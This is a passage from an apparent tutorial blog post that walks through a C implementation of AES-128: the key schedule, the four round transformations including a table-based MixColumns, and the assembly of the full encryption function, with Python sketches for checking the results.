0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }
}

Sweet, feel free to dump the round keys and compare them with an official test vector to convince yourself that this thing works. Once we have that function, we need to build the different primitives that the core encryption algorithm will use & reuse to generate the encrypted block. Some of them are like 1 line of C, really simple ; some others are a bit more twisted, but whatever.
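If you want something to compare the dumped round keys against, here is a minimal Python sketch of the same key expansion, written word by word as in FIPS-197 rather than as a port of the C code. The helper names (gf_mul, make_sbox, expand_key) are mine, and the S-box is recomputed from its mathematical definition instead of being pasted, which is an assumption of this sketch and not how the C version does it.

```python
def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) modulo the AES polynomial 0x11B."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return result


def make_sbox():
    """Rebuild the forward S-box: field inverse followed by the affine map."""
    sbox = []
    for x in range(256):
        inv = 0
        if x:
            inv = 1
            for _ in range(254):  # x^254 is the inverse of x in GF(2^8)
                inv = gf_mul(inv, x)
        y = 0x63
        for shift in range(5):  # inv ^ rotl(inv,1) ^ ... ^ rotl(inv,4)
            y ^= ((inv << shift) | (inv >> (8 - shift))) & 0xFF
        sbox.append(y)
    return sbox


SBOX = make_sbox()


def expand_key(key):
    """Return the 11 round keys (16 bytes each) for a 16-byte AES-128 key."""
    words = [list(key[4 * k:4 * k + 4]) for k in range(4)]
    rcon = 1
    for k in range(4, 44):
        temp = list(words[k - 1])
        if k % 4 == 0:
            temp = temp[1:] + temp[:1]      # rotate the word by one byte
            temp = [SBOX[b] for b in temp]  # substitute every byte
            temp[0] ^= rcon                 # xor the round constant
            rcon = gf_mul(rcon, 2)
        words.append([a ^ b for a, b in zip(words[k - 4], temp)])
    return [bytes(sum(words[4 * r:4 * r + 4], [])) for r in range(11)]


# Key taken from the FIPS-197 key expansion example (Appendix A.1).
key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")
round_keys = expand_key(key)
for number, round_key in enumerate(round_keys):
    print(number, round_key.hex())
```

The first printed line is the key itself, and the following ones can be compared byte for byte with what the C function stores in round_keys.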

Encryption process

Transformations

AddRoundKey

This one is really simple: it takes the state & a round key (which one depends on the round you are currently in), and xors every single byte of the state with the matching byte of the round-key.

void AddRoundKey(unsigned char roundkey[16], unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] ^= roundkey[i];
}

SubBytes

Another simple one: it takes the state as input & will substitute every byte using the forward substitution box S_box.

void SubBytes(unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] = S_box[out[i]];
}

If you are interested in how the values of the S_box are computed, you should read the following blogpost AES SBox and ParisGP written by my mate @kutioo.

ShiftRows

This operation is a bit more tricky, but it is still fairly straightforward. Imagine that the state is a 4x4 matrix: you just have to left rotate the second row by 1 byte, the third one by 2 bytes & finally the last one by 3 bytes. This can be done in C like this:

__forceinline void ShiftRows(unsigned char out[16])
{
    // +----+----+----+----+
    // | 00 | 04 | 08 | 12 |
    // +----+----+----+----+
    // | 01 | 05 | 09 | 13 |
    // +----+----+----+----+
    // | 02 | 06 | 10 | 14 |
    // +----+----+----+----+
    // | 03 | 07 | 11 | 15 |
    // +----+----+----+----+
    unsigned char tmp1, tmp2;

    tmp1 = out[1];
    out[1] = out[5];
    out[5] = out[9];
    out[9] = out[13];
    out[13] = tmp1;

    tmp1 = out[2];
    tmp2 = out[6];
    out[2] = out[10];
    out[6] = out[14];
    out[10] = tmp1;
    out[14] = tmp2;

    tmp1 = out[3];
    out[3] = out[15];
    out[15] = out[11];
    out[11] = out[7];
    out[7] = tmp1;
}
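The byte shuffling above can also be written as a single index formula. This is a small Python sketch of that view, assuming the same column-major layout as the diagram in the C comment; the function name shift_rows is hypothetical.

```python
def shift_rows(state):
    """Return a new 16-byte state with row r rotated left by r positions.

    The state is column-major: byte (row r, column c) lives at index r + 4*c.
    """
    return [state[r + 4 * ((c + r) % 4)] for c in range(4) for r in range(4)]


# Using the indexes themselves as values shows where each byte comes from.
permutation = shift_rows(list(range(16)))
print(permutation)
```

Each printed number is the index the byte was read from, so the list can be checked against the assignments of the C function one by one (for instance, position 1 receives the old byte 5).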

MixColumns

I guess this one is the least trivial one to implement & understand. Basically it is a "matrix multiplication" (in GF(2^8) though, hence the double-quotes) between 4 bytes of the state (row matrix) and a fixed 4x4 matrix. That gives you 4 new state bytes, so you do that for every double-word of your state.

Now, I kind of cheated for my implementation: instead of implementing the "weird" multiplication, I figured I could use a pre-computed table instead to avoid all the hassle. Because the fixed matrix has only 3 different values (1, 2 & 3) the final table has a really small memory footprint: 3*0x100 bytes basically (if I'm being honest I even stole this table from @elvanderb's crazy white-box generator).

const unsigned char gmul[3][0x100] = {
    { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
    { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
    { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
};

Once you have this magic table, the multiplication gets really easy. Let's take an example:

[Figure: mixcolumn_example.png]

As I said, the four bytes at the left are from your state & the 4x4 matrix is the fixed one (filled only with 3 different values). To have the result of this multiplication you just have to execute this:

reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])

The first index into the table is the actual value taken from the 4x4 matrix minus one (because our array is addressed from index 0). So then you can declare your own 4x4 matrix with proper indexes & do the multiplication four times:

void MixColumns(unsigned char out[16])
{
    const unsigned char matrix[16] = {
        1, 2, 0, 0,
        0, 1, 2, 0,
        0, 0, 1, 2,
        2, 0, 0, 1
    },

    /// In[19]: reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])
    /// Out[19] : 4
    /// In [20]: reduce(operator.xor, [gmul[0][0xd4], gmul[1][0xbf], gmul[2][0x5d], gmul[0][0x30]])
    /// Out[20]: 102

    gmul[3][0x100] = {
        { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
        { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
        { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
    };

    for (size_t i = 0; i < 4; ++i)
    {
        unsigned char a = out[i * 4 + 0];
        unsigned char b = out[i * 4 + 1];
        unsigned char c = out[i * 4 + 2];
        unsigned char d = out[i * 4 + 3];

        out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
        out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
        out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
        out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];
    }
}
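The lookup table does not have to be taken on faith. Here is a short Python sketch that rebuilds the three rows of gmul from the "multiply by 2" primitive and replays the example column used above; xtime, MATRIX and mix_column are hypothetical names introduced for this sketch.

```python
def xtime(b):
    """Multiply a byte by 2 in GF(2^8), reducing by the AES polynomial."""
    b <<= 1
    if b & 0x100:
        b ^= 0x11B
    return b


# gmul[k][b] holds (k+1)*b, mirroring the layout of the C table above.
gmul = [
    [b for b in range(256)],            # multiplication by 1
    [xtime(b) for b in range(256)],     # multiplication by 2
    [xtime(b) ^ b for b in range(256)], # multiplication by 3 = 2*b xor b
]

# Coefficient matrix, stored minus one so it can index gmul directly.
MATRIX = [
    [1, 2, 0, 0],
    [0, 1, 2, 0],
    [0, 0, 1, 2],
    [2, 0, 0, 1],
]


def mix_column(column):
    """Multiply one 4-byte column by the fixed MixColumns matrix."""
    out = []
    for row in MATRIX:
        acc = 0
        for coeff, byte in zip(row, column):
            acc ^= gmul[coeff][byte]
        out.append(acc)
    return out


result = mix_column([0xD4, 0xBF, 0x5D, 0x30])
print([hex(b) for b in result])
```

The first two output bytes are the 4 and 102 quoted in the comments of the C function. Generating the table this way is slower than embedding it, which does not matter for a one-off check.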

Combine them together

Now we have everything we need, it is going to be easy peasy ; really:

  1. The initial state is populated with the plain-text block
  2. Generate the round-keys thanks to the key schedule ; remember 11 keys, the first one being the plain encryption key
  3. The first round, which is different from the others, is a simple AddRoundKey operation
  4. Then we enter the main loop which does 9 rounds:
    1. SubBytes
    2. ShiftRows
    3. MixColumns
    4. AddRoundKey
  5. Last round which is also a bit different:
    1. SubBytes
    2. ShiftRows
    3. AddRoundKey
  6. The state is now your encrypted block, yay!

Here we are, we finally have our AES128 encryption function that we will use as a reference:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

